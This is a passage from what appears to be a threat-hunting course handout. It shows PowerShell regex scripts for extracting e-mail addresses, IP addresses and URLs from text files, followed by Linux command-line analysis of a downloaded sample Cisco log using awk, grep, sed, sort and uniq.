1097To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1098------------------------Type This------------------------------
# Pull every e-mail-address-shaped string out of $input_path and write one per
# line to $output_file. The TLD group is limited to 2-4 letters, so longer
# TLDs will not be matched.
$input_path = 'c:\ps\emails.txt'
$output_file = 'c:\ps\extracted_addresses.txt'
$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
Select-String -Path $input_path -Pattern $regex -AllMatches |
  ForEach-Object { $_.Matches } |
  ForEach-Object { $_.Value } > $output_file
1103---------------------------------------------------------------
1104
1105
1106In this script, we have the following variables:
1107
11081) $input_path to hold the path to the input file we want to parse
1109
11102) $output_file to hold the path to the file we want the results to be stored in
1111
11123) $regex to hold the regular expression pattern to be used when the strings are being matched.
1113
1114The select-string cmdlet contains various parameters as follows:
1115
11161) "-Path" which takes as input the full path to the input file
1117
11182) "-Pattern" which takes as input the regular expression used in the matching process
1119
11203) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found); the results are piped to "$_.Matches" and then "$_.Value", which represent the current values of all the matches.
1121
1122Using ">" the results are written to the destination specified in the $output_file variable.
1123
1124Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1125
1126IP addresses
1127------------
1128For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
1129------------------------Type This------------------------------
# Pull every dotted-quad string out of $input_path into $output_file. Each
# \d{1,3} accepts 0-999, so the pattern is loose rather than a strict IPv4 check.
$input_path = 'c:\ps\ip_addresses.txt'
$output_file = 'c:\ps\extracted_ip_addresses.txt'
$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
Select-String -Path $input_path -Pattern $regex -AllMatches |
  ForEach-Object { $_.Matches } |
  ForEach-Object { $_.Value } > $output_file
1134---------------------------------------------------------------
1135
1136
1137
1138URLs
1139----
1140For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1141You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1142------------------------Type This------------------------------
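# Pull every URL (scheme://host[/path]) out of $input_path into $output_file.
$input_path = 'c:\ps\URL_addresses.txt'
$output_file = 'c:\ps\extracted_URL_addresses.txt'
# The path group is greedy. The previous pattern ended in a lazy '*?' with
# nothing after it, which always matches zero repetitions, so only
# 'scheme://host' was ever extracted and the path was silently dropped. The
# space has also been removed from the path character class so a match stops
# at the end of the URL instead of running into the words that follow it.
$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w\-./?%&=]*)*'
Select-String -Path $input_path -Pattern $regex -AllMatches |
  ForEach-Object { $_.Matches } |
  ForEach-Object { $_.Value } > $output_file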
1147---------------------------------------------------------------
1148
1149In addition to the examples above, many other types of strings can be extracted using this script.
1150All you need to do is switch the regular expression in the "$regex" variable!
1151In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1152
1153
1154
1155 ######################################
1156----------- ############### # Day 5: Wrapping up threat hunting ################ -----------
1157 #####################################
1158
1159##############################################
1160# Log Analysis with Linux command-line tools #
1161##############################################
1162The following command-line executables are found on macOS as well as in most Linux distributions.
1163
1164cat – prints the content of a file in the terminal window
1165grep – searches and filters based on patterns
1166awk – can sort each row into fields and display only what is needed
1167sed – performs find and replace functions
1168sort – arranges output in an order
1169uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1170
1171
1172##############
1173# Cisco Logs #
1174##############
1175
1176-----------------------------Type this-----------------------------------------
# Fetch the sample Cisco log. This is plain HTTP from an IP literal: the
# transfer is neither authenticated nor integrity-checked, so treat the file
# as untrusted input for the parsing steps that follow.
wget -- 'http://45.63.104.73/cisco.log'
1178-------------------------------------------------------------------------------
1179
1180AWK Basics
1181----------
1182To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1183
1184-----------------------------Type this-----------------------------------------
# Print the 5th whitespace-separated field of every line; tail keeps the last four.
awk '{print $5}' cisco.log | tail -n 4
1186-------------------------------------------------------------------------------
1187
1188
1189
1190Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort”, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1191
1192-----------------------------Type this-----------------------------------------
# Frequency table of field 5: sort so duplicates are adjacent, count them with
# uniq -c, then order the counts numerically, highest first.
awk '{print $5}' cisco.log | sort | uniq -c | sort -rn
1194-------------------------------------------------------------------------------
1195
1196
1197
1198While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This ensures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1199
1200-----------------------------Type this-----------------------------------------
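# Keep only lines that carry a %FACILITY-SEVERITY-MNEMONIC tag before tallying
# field 5. The pattern is single-quoted: left bare, the shell would try to
# glob-expand the '*' and '[...]' against files in the current directory
# before grep ever saw it, and a matching filename would silently change the
# search. '--' stops grep from reading a pattern that starts with '-' as an option.
grep -- '%[a-zA-Z]*-[0-9]-[a-zA-Z]*' cisco.log | awk '{print $5}' | sort | uniq -c | sort -rn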
1202-------------------------------------------------------------------------------
1203
1204
1205
1206
1207Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1208
1209-----------------------------Type this-----------------------------------------
# All lines tagged LINEPROTO-5-UPDOWN.
grep -- '%LINEPROTO-5-UPDOWN:' cisco.log

# Tally field 10 of those lines (presumably the interface — verify against a
# sample line), commas still attached.
grep -- '%LINEPROTO-5-UPDOWN:' cisco.log | awk '{print $10}' | sort | uniq -c | sort -rn

# Same tally with commas stripped first, so a token with and without a trailing
# comma counts as one key.
grep -- '%LINEPROTO-5-UPDOWN:' cisco.log | sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

# Pair field 10 with field 14 as "<f10> changed to <f14>" and tally the pairs.
grep -- '%LINEPROTO-5-UPDOWN:' cisco.log | sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1217--------------------------------------------------------------------------------